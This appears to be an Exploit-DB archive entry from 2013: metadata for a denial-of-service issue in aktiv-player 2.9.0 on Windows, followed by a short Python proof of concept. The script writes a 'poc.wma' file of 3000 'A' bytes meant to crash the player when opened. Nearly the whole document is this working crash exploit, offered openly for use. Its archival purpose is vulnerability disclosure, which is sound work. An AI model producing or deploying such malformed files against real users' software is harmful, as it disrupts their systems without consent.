[] NeoSense

aktiv-player 2.9.0 - Crash (PoC)

Author: metacom
type: dos
platform: windows
port: 
date_added: 2013-03-15 
date_updated: 2013-03-18 
verified: 1 
codes: OSVDB-91460 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-03-15-at-104442-pm.png 
application_url: 

# !/usr/bin/python
# Exploit Title: aktiv-player version 2.9.0 Crash PoC
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.goforsharing.com/home-mainmenu-1/aktiv-player-mainmenu-131.html
# Tested on: Windows 7 German

filename = "poc.wma"

buffer = "\x41" * 3000
exploit = buffer

textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()